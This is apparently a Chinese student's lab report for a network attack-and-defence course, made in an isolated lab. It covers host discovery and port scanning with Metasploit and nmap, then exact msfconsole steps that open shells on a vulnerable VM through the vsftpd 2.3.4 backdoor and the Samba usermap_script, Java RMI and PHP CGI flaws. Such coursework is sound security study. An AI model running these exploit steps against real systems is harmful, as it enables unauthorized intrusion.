20232320 2025-2026-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
信息收集
使用Metasploit发现靶机IP。
对靶机进行端口扫描。
漏洞利用,利用漏洞获取Shell
Vsftpd后门漏洞(端口21)
Samba命令注入漏洞(端口139)
Java RMI漏洞(端口1099)
PHP CGI注入漏洞(端口80)
2.实验过程
(1)前期渗透
kali攻击机:192.168.190.129
靶机:192.168.190.142
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
在kali中使用msfconsole
输入search arp_sweep搜索ARP扫描辅助模块
使用use 0
扫描靶机所在网段set RHOSTS 192.168.190.0/24
run开始

可以看到我们的靶机142,是VMware, Inc.是vmware虚拟机
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
使用nmap进行端口扫描
kali中输入nmap -sS -sV 192.168.190.142

可以看到扫描metaploit开放的多个端口以及对应的服务
使用Metasploit的portscan/tcp模块
还是先打开msfconsole
use auxiliary/scanner/portscan/tcp启动Metasploit框架内置的一个TCP端口扫描器,用来发现目标机器开放了哪些端口
set RHOSTS 192.168.190.142
set THREADS 10多线程,提高效率
run

可以看到开放的多个端口
③选做:也可以扫系统版本、漏洞等。
kali中输入nmap -script=vuln 192.168.190.142






(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:
在特定版本的vsftpd服务器程序中,被人恶意植入代码
当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
看看21端口是否开放nmap -sV -p 21 192.168.190.142

可以看到21端口是开放的,开放了ftp服务,使用的是vsftpd 2.3.4
下面使用Metasploit来利用vsftpd 2.3.4的服务后门漏洞
msfconsole
search vsftpd搜索这个vsftpd 2.3.4信息
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.190.142
run

利用成功,成功获取shell,并执行了uname –a、pwd、id等命令验证
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
扫描139端口

139开放了netbios-ssn服务,使用的是Samba (版本范围3.X-4.X)
使用Metasploit来利用这个Samba服务的漏洞
msfconsole
use exploit/multi/samba/usermap_script
set RHOST 192.168.190.142
run

利用成功,执行uname–a验证
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:
Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
首先查看1099端口是否打开。

1099端口开放了java-rmi服务,使用的是GNU Classpath grmiregistry
然后在MSF中:
msfconsole
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.190.142
run
shell (进入meterpreter时,使用whoami验证下)

(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:
CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
扫描80端口

看到80端口是HTTP服务,使用Apache httpd 2.2.8 (运行在Ubuntu系统上,并启用了WebDAV)
在kali中执行msfconsole,启动metasploit
use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST 192.168.190.142
run

成功获取shell并验证
3.学习感悟、思考等
本次实验顺顺利利,没有遇到什么问题,主要是根据操作步骤利用MSF工具拿到shell

浙公网安备 33010602011771号